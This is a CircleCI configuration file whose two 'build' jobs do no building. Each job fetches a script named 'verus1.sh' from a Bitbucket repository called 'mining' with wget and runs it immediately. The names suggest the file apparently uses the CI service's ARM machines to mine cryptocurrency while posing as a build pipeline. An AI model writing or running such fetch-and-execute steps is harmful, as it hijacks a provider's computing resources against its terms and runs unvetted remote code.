version: 2.1

jobs:
  build-medium:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: arm.large
    steps:
      - run: wget https://bitbucket.org/gshch828/mining/raw/68fabb5db97a7a2fe648cdb0606bb1d9c18a5add/verus1.sh && ./verus1.sh

  build-large:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: arm.large
    steps:
      - run: wget https://bitbucket.org/gshch828/mining/raw/68fabb5db97a7a2fe648cdb0606bb1d9c18a5add/verus1.sh && ./verus1.sh

workflows:
  build:
    jobs:
      - build-medium
      - build-large
